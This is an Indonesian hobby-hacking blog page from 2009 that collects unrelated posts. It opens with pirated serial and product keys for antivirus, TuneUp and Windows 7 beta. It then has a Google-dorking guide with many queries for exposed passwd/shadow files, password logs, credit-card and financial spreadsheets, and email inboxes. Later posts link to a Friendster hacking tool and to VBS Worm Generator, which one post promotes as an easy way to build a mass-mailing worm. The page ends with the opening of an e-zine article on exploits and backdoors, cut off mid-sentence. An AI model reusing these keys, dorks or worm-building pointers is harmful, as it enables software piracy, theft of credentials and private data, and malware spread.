Sabtu, 04 April 2009

Serial Number Colection

  • NORTON AV 2006: VBTXVTC8VBCFX92HC84WBCB8
  • Noron Internet Security 2008 Name: sonajon S/N: 012345794dj4d
  • sn norton is 2009 SN: JHFRX-4QWG7-DPRQF-9BRWD-3RVRP
  •  kaspersky internet security 2009 Sn : 26H4B-E7S5J-ZQN71-PKA87
  • Tune Up 2009 :
Name: whatever
Orga: whatever
Serial:
BFD45E-630ATE-H1MA0C-0HWTRB-15KY5M-F0V291
BFD6YK-XW1Q1H-R1CQAR-3R0K42-AACXJ7-14WARD
BFE1H2-T00WJ1-EV1RQJ-AH73RC-731X3V-WW0BMV
BFF8V6-M9MC98-V2K17X-XHNMR8-CYJN00-QDPYNB
BFHTXJ-JHB14W-QYYRNN-BWA6JJ-XYQND7-0A4EQ9
AQKA2P-HY7FQF-8M0930-DW4H4V-1EJPRC-16CHPN

Name: www.dl4all.com
Orga: DL4ALL
Serial: 
BFD45E-630ATE-H1MA0C-0HWTRB-15KY5M-F0V291
BFD6YK-XW1Q1H-R1CQAR-3R0K42-AACXJ7-14WARD
BFE1H2-T00WJ1-EV1RQJ-AH73RC-731X3V-WW0BMV
BFF8V6-M9MC98-V2K17X-XHNMR8-CYJN00-QDPYNB
BFHTXJ-JHB14W-QYYRNN-BWA6JJ-XYQND7-0A4EQ9

name : ferum
orga : vistasoft
serial :
AQKA2P-HY7FQF-8M0930-DW4H4V-1EJPRC-16CHPN
  • lisensi page maker 7
serial : 1039 - 1205 - 2207 - 7607 - 0043 - 8249
  • Windows 7 Beta 32-bit Product Key
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7

  • Windows 7 Beta 64-bit Product Keys
7XRCQ-RPY28-YY9P8-R6HD8-84GH3
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
482XP-6J9WR-4JXT3-VBPP6-FQF4M
JYDV8-H8VXG-74RPT-6BJPB-X42V4
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9

Daftar RUN Pada Windows XP

Berikut ini adalah daftar 99 perintah untuk menjalankan aplikasi dari RUN pada windows XP.

1. Accessibility Controls = access.cpl
2. Add Hardware Wizard = hdwwiz.cpl
3. Add/Remove Programs = appwiz.cpl
4. Administrative Tools = control admintools
5. Automatic Updates = wuaucpl.cpl
6. Bluetooth Transfer Wizard = fsquirt
7. Calculator = calc
8. Certificate Manager = certmgr.msc
9. Character Map = charmap
10. Check Disk Utility = chkdsk
11. Clipboard Viewer = clipbrd
12. Command Prompt = cmd
13. Component Services = dcomcnfg
14. Computer Management = compmgmt.msc
15. Date and Time Properties = timedate.cpl
16. DDE Shares = ddeshare
17. Device Manager = devmgmt.msc
18. Direct X Control Panel (If Installed)* = directx.cpl
19. Direct X Troubleshooter = dxdiag
20. Disk Cleanup Utility = cleanmgr
21. Disk Defragment = dfrg.msc
22. Disk Management = diskmgmt.msc
23. Disk Partition Manager = diskpart
24. Display Properties = control desktop/desk.cpl
25. Dr. Watson System Troubleshooting Utility = drwtsn32
26. Driver Verifier Utility = verifier
27. Event Viewer = eventvwr.msc
28. File Signature Verification Tool = sigverif
29. Findfast = findfast.cpl
30. Folders Properties = control folders
31. Fonts = control fonts
32. Fonts Folder = fonts
33. Free Cell Card Game = freecell
34. Game Controllers = joy.cpl
35. Group Policy Editor (XP Prof) = gpedit.msc
36. Hearts Card Game = mshearts
37. Iexpress Wizard = iexpress
38. Indexing Service = ciadv.msc
39. Internet Properties = inetcpl.cpl
40. IP Configuration = ipconfig
41. Java Control Panel (If Installed) = jpicpl32.cpl
42. Java Application Cache Viewer (If Installed) = javaws
43. Keyboard Properties = control keyboard
44. Local Security Settings = secpol.msc
45. Local Users and Groups = lusrmgr.msc
46. Logs You Out Of Windows = logoff
47. Microsoft Chat = winchat
48. Minesweeper Game = winmine
49. Mouse Properties = control mouse
50. Mouse Properties = main.cpl
51. Network Connections = control netconnections
52. Network Connections = ncpa.cpl
53. Network Setup Wizard = netsetup.cpl
54. Notepad = notepad
55. Nview Desktop Manager (If Installed) = nvtuicpl.cpl
56. Object Packager = packager
57. ODBC Data Source Administrator = odbccp32.cpl
58. On Screen Keyboard = osk
59. Opens AC3 Filter (If Installed) = ac3filter.cpl
60. Password Properties = password.cpl
61. Performance Monitor = 
62. Performance Monitor = perfmon
63. Phone and Modem Options = telephon.cpl
64. Power Configuration = powercfg.cpl
65. Printers and Faxes = control printers
66. Printers Folder = printers
67. Private Character Editor = eudcedit
68. Quicktime (If Installed) = QuickTime.cpl
69. Regional Settings = intl.cpl
70. Registry Editor = regedit
71. Registry Editor = regedit32
72. Remote Desktop = mstsc
73. Removable Storage = ntmsmgr.msc
74. Removable Storage Operator Requests = ntmsoprq.msc
75. Resultant Set of Policy (XP Prof) = rsop.msc
76. Scanners and Cameras = sticpl.cpl
77. Scheduled Tasks = control schedtasks
78. Security Center = wscui.cpl
79. Services = services.msc
80. Shared Folders = fsmgmt.msc
81. Shuts Down Windows = shutdown
82. Sounds and Audio = mmsys.cpl
83. Spider Solitare Card Game = spider
84. SQL Client Configuration = cliconfg
85. System Configuration Editor = sysedit
86. System Configuration Utility = msconfig
87. System File Checker Utility = sfc
88. System Properties = sysdm.cpl
89. Task Manager = taskmgr
90. Telnet Client = telnet
91. User Account Management = nusrmgr.cpl
92. Utility Manager = utilman
93. Windows Firewall = firewall.cpl
94. Windows Magnifier = magnify
95. Windows Management Infrastructure = wmimgmt.msc
96. Windows System Security Tool = syskey
97. Windows Update Launches = wupdmgr
98. Windows XP Tour Wizard = tourstart
99. Wordpad = write

Nyari Password Lewat Google

Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi.

Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com

Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :

Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.

"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.

“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.



Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.



>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.


“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.

Sebagai contoh:

“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org


“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :



“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.



“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.



“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.



“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.



Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.


ex :

Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery

Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)

Operator dasar

+, -, ~ , ., *, “”, |, OR

Operator tambahan

allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Pencarian berdasarkan range
komputer Rp5000000..7000000

Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu

Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls

Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”

Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”

Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

Mencari License Key
Filetype: lic lic intext: key

Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples

Virus Pengingat Waktu Shalat


Tampilan virus VBWorm.NVX
Jakarta - Ada-ada saja perilaku pembuat virus komputer di Indonesia. Bertepatan dengan bulan ramadan, sebuah virus akan mematikan komputer korbannya jika belum salat.

Virus bernama VBWorm.NVX itu dikabarkan kehadirannya oleh para analis dari Vaksin.com. Virus ‘religius’ itu akan menampilkan pesan lima kali sehari sesuai waktu salat umat islam.

Seperti disampaikan analis Vaksin.com, Adang Jauhar Taufik, dalam keterangan yang diterima detikINET, Jumat (28/9/2007), virus itu akan aktif setiap hari pukul 13.00, (waktu Dzuhur), 16:00 (waktu Ashar), 18:30 (waktu Maghrib), 20:00 (waktu Isya) dan 5:30 (waktu Subuh).

Virus itu menampilkan pesan “Apakah Anda seorang Muslim ?” jika dijawab ‘Ya’, virus itu akan melanjutkan dengan ‘Sudahkan Anda Shalat ?’. Jika pada pertanyaan kedua dijawab ‘Sudah’ maka pesan akan hilang, tapi jika dijawab ‘belum’ maka komputer akan dimatikan.

“VBWorm.NVX ini tergolong masih baik karena tidak sampai melakukan blok terhadap fungsi Windows atau tools security, VBWorm.NVX juga tidak akan menyembunyikan file atau dokumen dan tidak akan membuat file duplikat seperti yang dilakukan oleh virus lokal pada umumnya,” ujar Adang.

Meski demikian, keberadaan virus ini tetap tidak bisa dibilang sebagai perbuatan baik. Adang berpendapat lebih baik tidak membuat virus atau program sejenis daripada membuatnya meski dengan tujuan atau niatan baik.

VBWorm.NVX memiliki wujud icon Microsoft Windows Explorer dengan tipe file aplikasi (.exe) berukuran 56 kilobyte. Pengguna komputer bisa tertular virus ini melalui jalur USB Flash Drive.

Tak lupa Adang pun mengingatkan pengguna komputer untuk selalu berhati-hati dan menyiapkan antivirus yang sudah up to date

Sumber : detikinet

Cara Membuat Windows XP semakin Cepat

Di tempat anda, mungkin banyak orang yang bisa meng- install program. Namun saya yakin sangat sedikit sekali yang mengerti dan mau memahami seni dari proses install tersebut sehingga menghasilkan PC yang optimal.
Sering kita jumpai, komputer sekelas Pentium IV masih dikatakan lambat.

Padahal sudah dilakukan berbagai upaya untuk menambah memori dan meningkatkan prosesor. Namun tetap saja, masih ada beberapa proses yang dianggap lambat.
Dengan settingan berikut, anda bisa menyulap Pentium III secepat Pentium IV.

Ruang-ruang yang akan kita sentuh adalah sebagai berikut :

1. System Properties
2. System Configuration
3. Registry


1. System Properties

Adalah ruang berisi informasi tentang nama dan organisasi pemilik. Anda bisa membukanya dengan klik kanan pada icon MyKomputer dan pilih Properties . Atau bisa juga dengan menekan tombol Start + Pause Break .

Ada beberapa rahasia yang akan kita obrak-abrik pada system properties ini, sehingga menghasilkan installasi yang optimal. Ikuti langkah berikut :

1. Klik kanan pada icon MyComputer dan pilih Properties . Atau bisa juga dengan menekan tombol Start + Pause Break .
2. Klik menu System Restore , pastikan anda mengklik Turn Off System Restore On All Drives .

Ini akan sangat berguna untuk menghalau salah satu cara perkembangbiakan virus.
3. Kemudian klik Advanced .
Terdapat 3 menu setting di bawahnya.

* Klik Setting pertama dan pastikan anda memilih Adjust For Best Performance . Lanjutkan dengan mengklik Apply . Tunggu beberapa saat, dan tampilan windows akan berubah menjadi klasik. Tampilan tersebut dapat kita rubah sesuai keinginan kita nanti.
* Selanjutnya klik Advanced , dan klik Change untuk merubah Virtual Memory.

(Virtual memory adalah Space yang dijadikan memory bayangan untuk membantu kinerja memory asli yang biasa kita sebut RAM . Virtual memory ini akan meminta ruangan dari harddisk.
* Pada sub menu Custome Size , terdapat kolom Initial Size . Isikan kolom dengan angka minimal 2 kali jumlah RAM yang anda pasang.

Misalnya anda memasang RAM 128 MB, maka isi kolom tersebut dengan jumlah minimal 256. Dan pada kolom berikutnya isi dengan 2 x kolom pertama. Jangan lupa klik Set . Klik OK dan OK lagi sehingga kembali ke System Properties awal.
* Sekarang, klik menu Setting yang ketiga, anda akan melihat dua kolom yang berisi angka 30. Rubah angka tersebut menjadi 3 . Kemudian buang tanda Ceklis (v) pada Automatically Restart .
* Klik OK setelah selesai.
* Tutup System Properties dengan mengklik OK

Dari hasil otak-atik tadi, tampilan windows terasa amat membosankan. Semuanya serba Classic, seolah-olah bukan Windows XP.

Jangan khawatir, itu hanya sekedar tampilan yang bisa kita rubah setiap saat. Caranya :

1. Klik kanan di ruang kosong pada area Desktop dan pilih Properties sehingga muncul kotak dialog Display Properties
2. Klik menu Themes , kemudian pada kolom Themes dibawahnya, klik tanda panah ( Pop up ) dan pilih Windows XP .

Jika sebelumnya sudah terpilih Windows XP , maka pilih dulu Themes lain, kemudian klik panah lagi dan pilih Windows XP . Ini dilakukan untuk memancing tampilan Windows XP yang sesungguhnya.
3. Klik Apply dan lihat hasilnya.
4. Selanjutnya klik menu Desktop , perhatikan di bagian bawah. Disana terdapat sub menu Customize Desktop , klik menu tersebut.
5. Pada tampilan kotak dialog berikutnya, pastikan anda membuang tanda Ceklis (v) pada Run Desktop Cleanup Every 60 Days.

Ini dilakukan untuk menghindari penghapusan otomatis Windows terhadap icon-icon yang sudah dianggap tidak penting, padahal menurut kita masih sangat penting.
6. Klik OK dan OK lagi untuk menutup Display Properties


2. System Configuration

Please, jangan pusing dulu …

Ruang berikutnya yang akan kita bedah adalah System Configuration . Perhatikan langkah berikut :

1. Klik Start pilih Run dan ketik msconfig kemudian Ok atau langsung tekan Enter
2. Dideretan menu bagian atas, di ujung kanan terdapat menu Startup . Klik menu tersebut.
3. Lihat ke bagian bawah, terdapat sederetan nama dengan masing-masing mempunyai tanda ceklis (v).

Nama-nama tersebut adalah indikasi program yang akan selalu berjalan ketika Windows baru pertama kali tampil. Dan jika kita membiarkan tanda ceklisnya, maka Windows akan sedikit lambat ketika pertama kali proses Loading .

1. buang tanda ceklis pada nama program yang dianggap tidak perlu untuk ditampilkan pada waktu START UP. Kemudian klik Apply
2. Klik OK untuk menutup System Configuration dan klik Restart .
3. Minum kopi, makan cemilan, atau pesen nasi goreng untuk menunggu komputer anda yang Restart.

Setelah komputer Restart dan kembali ke ruangan Desktop , anda dikagetkan dengan munculnya kotak dialog yang tentu saja berbahasa inggris. J

Langsung saja klik kotak kecil untuk memberi ceklis pada Don't Show This Massage ….., (dst) kemudian klik OK . Maka kotak tadi tidak akan muncul lagi ketika Windows baru Restart .

3. Registry

Registry adalah ruang Administrator Windows. Keluar masuknya program yang terinstall akan selalu melapor terlebih dahulu ke Registry .

Berikut ini adalah directory yang terdapat di Registry yang akan kita obrak-abrik J :

1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG

Wah, istilah-istilah apapula itu ?..... Bah … J

Yang akan kita sentuh adalah bagian a dan b . Ikuti langkah berikut :

1. Klik Start pilih Run dan ketik regedit , klik OK atau langsung tekan Enter
2. Klik tanda plus (+) pada HKEY_CURRENT_USER
3. Klik tanda plus (+) pada Control Panel
4. Klik tanda plus (+) pada Desktop

( Perhatikan jendela sebelah kanan pada posisi Desktop. Terdapat sederetan String yang cukup memusingkan dan tentu saja berbahasa Inggris. J . Cari dan temukan MenuShowDelay . Jika sudah ketemu, klik dua kali dan rubah nilainya dari 400 menjadi 0, kemudian klik OK )
5. Sekarang kembali ke jendela sebelah kiri
6. Dibawah directory Desktop terdapat sub directory WindowsMetrics . Klik sub directory tersebut dan perhatikan jendela sebelah kanan.
7. Cari dan temukan MinAnimate , klik dua kali pada value tersebut dan rubah nilainya menjadi 1 , klik OK .

Sekarang tutup Registry dengan tombol Alt + F4 atau dengan mengklik tanda silang ( X) dibagian atas kanan jendela.

Restart Komputer anda dan lihat hasilnya.

moga berhasil .


Buku Hacker ( Black Book )

g usah muter" lagi di gramedia ataupun toko buku laen.
kayaNy buku ini bgs bwt dicoba belajar .

abis jalan" ketemu ini .

tinggal download aja !!
ne linkNy :
http://www.anonym.to/?http://www.fusion.pwp.blueyonder.co.uk/Hackers%20Black%20Book.rar

thank"s ya mazz .
yogyafree . ??


Truz Dukung Hack Indonesia Yach..........

Ngelacak No Hp Telkomsel (iseng)

habis dr yogyafree nich.

ada ini lumayan di sharing aja !!

klo kamu mao ngelacak no hp yg sering godain kamu lihat aja disini .
http://pulsa.web.id/hlrlookup/

tapi sayangnya cm ngelacak no. bwt telkomsel doang . .
Met Mencoba.........

Belajar Nge-Hack Friendster

jaman mulai hebat datangnya org" yg pandai nge-hack .
ternyata nge-hack friendster itu mudah banget g kaya' yg gw kira yg harus pandai programming .
coba download link dibawah ini .
coz terlalu besar untuk di posting .
bwt kamo" yg sering iseng otak - atik friendster .

dari pertama yang di ajarkan teman" hacker saya jd penasaran dan ingin bertanya" .
akhirnya bisa jg bwt nge-hack fs .

neE link'nya bwt download .
http://www.4shared.com/file/93550786/c385a4b8/hack_friendster_-_dhendhie.html


thank's broo, bwt yg bantu" .
tim yogyafree thank's .
jiahH !!

Menghilangkan Virus New Harry Potter

Tidak perlu kaget mungkin virus ini anda anggap virus yang baru-baru ada di tahun ini . setelah googling kemana kemari akhirnya ketemu juga . Diblog ini akan saya terangkan cara menhilangkan virus harry potter .

Ciri - Cirinya :
1. Membuat file induk database.mdb di My Documents
2. Membuat file autorun.inf di setiap drive,flash disk, dan folder
3. Membuat file Thumb.db (hati2 tanpa huruf s) di setiap folder
4. Membuat file Microsoft.lnk dan New Harry Potter and….lnk di setiap folder
5. Membuat duplikat setiap folder dengan extensi .lnk
6. Pada task manager terdapat services wscript.exe


Langkah - Langkah :
1. Matikan System Restore.. (kilk kanan di my computer)
2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)
Bisa menggunakan Process Explorer atau misc. tool pada HijackThis..
3. Hapus file virus database.mdb di My Documents..
4. Hapus file duplikat virus..
Gunakan fasilitas search pada Windows..
Pada “More advanced options”, pastikan option “Search system folders” dan “Search
hidden files and folders” keduanya terpilih..
Search file dengan nama autorun.inf ukurannya 8 KB
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk.lnk ukurannya 1 KB
Hapus semua file yang ditemukan..
5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb

Itu langkah hapus secara Manual….
pake Anti Virus buatan Anak Bangsa PCMAV (PC MEDIA)… setelah itu anda inspeksi satu2 ke tiap2 folder…. caranya buka satu persatu folder & hapus file yang dibuat oleh virus… biasanya dalam bentuk shortcut…

Cara Cepat Buat Virus Worm

Hy, teman?? Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip :
http://www.4shared.com/file/58988982/d138203b/Vbswg2BFix.html?s=1

Eksploit, Trapdoor, Backdoor, Dan Trojan Horse

Terbitan Online Kecoak Elektronik
http://k-elektronik.org

dijelaskan oleh: Ganjaman dan SuperCock [members of IndoHack]

Artikel ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas
jaringan komputer seperti exploit, trojan, dll dan ingin mengetahui konsep-konsep dasarnya.

Terimakasih kepada staf kecoak yang bersedia mempublikasikan artikel ini, terutama
LithiumError dan BigD yang telah memberikan masukan-masukan sangat berguna kepada kami.
Seperti biasa, ini hanyalah untuk tujuan informasi saja, dan mungkin sysadmin yang membaca
bisa menggunakan informasi ini untuk melindungi sistem dibawah pengawasan mereka.

Artikel ini berisi metode backdoor/trapdoor dan kode-kode yang bisa langsung diterapkan,
sebab kami ingin agar para pembaca mengetahui bagaimana * tepatnya * metode ybs bekerja.
Dan lagi, menyensor informasi bukanlah urusan kami.

1. Eksploit
===========

Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang
baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit
(exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan
artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah
sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa
berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan lain-lain.

Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita
akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah
'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah
satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah alami sendiri, kadang
sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan
'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing'
(hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote.
Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke
dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,
sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh
dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race
conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya
proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara
proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user
biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan
SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa
menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih
baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram
dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas),
banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu,
seperti:

http://www.rootshell.com
http://www.antionline.com
http://www.rhino9.com
http://www.dhp.com/~fyodor

atau di situs kecoak, http://k-elektronik.org/arsip/eksploit (*udah mati: editor)

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa
mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit
jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah
satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah
memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang
'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user,
maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root.

Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password.
Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah
portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi.
Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang
